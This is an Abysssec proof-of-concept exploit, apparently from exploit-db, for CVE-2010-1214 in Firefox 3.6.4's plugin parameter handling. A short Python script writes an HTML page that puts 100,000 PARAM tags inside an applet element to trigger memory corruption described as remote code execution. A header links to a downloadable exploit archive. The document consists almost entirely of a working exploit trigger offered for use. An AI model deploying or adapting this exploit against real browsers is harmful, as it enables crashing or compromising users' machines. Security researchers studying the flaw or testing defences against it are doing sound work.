Month Of Abysssec Undisclosed Bugs - Firefox Plugin Parameter

`'''  
__ __ ____ _ _ ____   
| \/ |/ __ \ /\ | | | | _ \  
| \ / | | | | / \ | | | | |_) |  
| |\/| | | | |/ /\ \| | | | _ <  
| | | | |__| / ____ \ |__| | |_) |  
|_| |_|\____/_/ \_\____/|____/  
  
http://www.exploit-db.com/moaub-17-firefox-plugin-parameter-ensurecachedattrparamarrays-remote-code-execution/  
http://www.exploit-db.com/sploits/moaub-17-exploit.zip  
'''  
'''  
Title : Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution  
Version : Firefox 3.6.4  
Analysis : http://www.abysssec.com  
Vendor : http://www.mozilla.com  
Impact : Critical  
Contact : shahin [at] abysssec.com , info [at] abysssec.com  
Twitter : @abysssec  
CVE : CVE-2010-1214  
  
'''  
  
import sys;  
  
myStyle = """  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"  
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head>  
<title>page demonstration</title>  
<link rel="stylesheet" type="text/css" href="style2.css" />  
  
  
</head>  
<body id='msg'>  
  
  
<applet code = 'appletComponentArch.DynamicTreeApplet' archive = 'DynamicTreeDemo.jar', width = 300, height = 300 >  
  
"""  
i=0  
while(i<100000):  
myStyle = myStyle + "<PARAM name='snd' value='Hello.au|Welcome.au'>\n";  
i=i+1  
  
myStyle = myStyle + """  
</applet>  
  
</body>  
</html>  
"""  
cssFile = open("Abysssec.html","w")  
cssFile.write(myStyle)  
cssFile.close()  
`